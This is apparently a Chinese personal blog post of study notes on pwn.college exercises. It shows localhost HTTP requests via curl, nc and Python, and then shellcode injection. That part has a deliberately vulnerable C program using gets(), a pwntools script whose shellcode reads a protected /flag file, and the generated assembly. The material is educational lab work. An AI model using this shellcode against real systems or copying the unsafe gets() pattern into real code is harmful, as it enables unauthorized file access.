pwn

pwn
字数统计: 636   |   阅读时长≈ 3 分钟

0x01 pwn.college

前期准备,生成ssh私钥和公钥,给pwn网站添加公钥,这边用vscode远程资源管理器去私钥登录,或者直接用powershell终端登录

http://t.csdnimg.cn/b9X6n

0x02 发送请求

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
curl:

curl -H "Host:90ff8555082552d83ed22b3934e4f3f1" http://localhost
curl -L http://localhost //跟进重定向
nc:

echo -e "GET /9ddc0eb235b474b67820b7077c4fe4c7 HTTP/1.1\r\n" | nc localhost 80
echo -e "GET / HTTP/1.1\r\nHost:localhost\r\n\r\n" | nc localhost 80


python: 


python -c "import requests;print(requests.get('http://localhost:80').text)"

python -c "import requests;print(requests.get('http://localhost:80',headers={'Host':'92a59af486b98360e57c91c48dda154c'}).text)"

python是自动跟进重定向的,可以改设置allow_redirecs=False
1
2
3
4
5
6
7
8
Make multiple requests in response to stateful HTTP responses using curl

curl -X GET http://127.0.0.1:80/request1 --cookie-jar cookies.txt 
--cookie cookies.txt

jar呢是将服务器的保存到txt里,而--cookie是从txt里读

这个不太懂,从request1直接读到request4

https://infosecwriteups.com/pwn-college-talking-to-web-walkthrough-by-karthikeyan-nagaraj-48d13b3a1216

0x03 shellcode injection

预备

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void b1() {puts("Bye!");}
void b2() {puts("Nope!");}

void hello(char *name,void (*b_func)()){
        printf("Hello %s!\n",name);
        b_func();
}

int main(int argc,char **argv){
        char name[1024];
        gets(name);
        srand(time(0));
        if(rand()%2) hello(b1,name);//顺序放错
        else hello(name,b2);
}

主要是hello(b1,name);执行这个肯定会崩溃

1.Write and execute shellcode to read the flag!

find搜了一下flag,是根目录的一个文件,但没有读权限

所以需要编写一个脚本,起码能chmod这个权限

.s后缀表示一个汇编语言源代码文件

直接写c,写完,说打开flag没权限

那用pwn库吧

1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context(arch = 'amd64' , os = 'linux')

#assembly = shellcraft.sh() #sh的shellcode
assembly = shellcraft.cat("/flag")  #直接读取flag,汇编代码

assemed=asm(assembly) #as,机器码
sh=process(f"/challenge/babyshell_level1")
sh.send(assemed)
sh.interactive()
print(assemed)

assembly内容是这样的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/* push b'/flag\x00' */
   mov rax, 0x101010101010101
   push rax
   mov rax, 0x101010101010101 ^ 0x67616c662f
   xor [rsp], rax
   /* call open('rsp', 'O_RDONLY', 'rdx') */
   push SYS_open /* 2 */
   pop rax
   mov rdi, rsp
   xor esi, esi /* O_RDONLY */
   syscall
   /* call sendfile(1, 'rax', 0, 0x7fffffff) */
   mov r10d, 0x7fffffff
   mov rsi, rax
   push SYS_sendfile /* 0x28 */
   pop rax
   push 1
   pop rdi
   cdq /* rdx=0 */
   syscall

一般步骤是先这样写一个asm文件,gcc汇编出来一个二进制文件a.out

再用 objcopy提取出来a.out的一部分机器码

1
2
3
objcopy --dump-section .text=b.bin a.out

cat b.bin | /babyshell_level1 #管道符接收输入

https://www.freebuf.com/articles/database/321327.html

https://medium.com/@muchiemma/how-to-write-shellcode-for-shellcode-injection-and-simplify-assembly-code-development-703c3f214c46

https://github.com/J-shiro/J-shiro.github.io/blob/master/content/post/english/pwn_college/module6/index.md

https://kunalwalavalkar.gitbook.io/write-ups/pwn-college/shellcode-injection

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2023-2025 是羽泪云诶
  • 访问人数: | 浏览次数:

请我喝杯咖啡吧~

支付宝
微信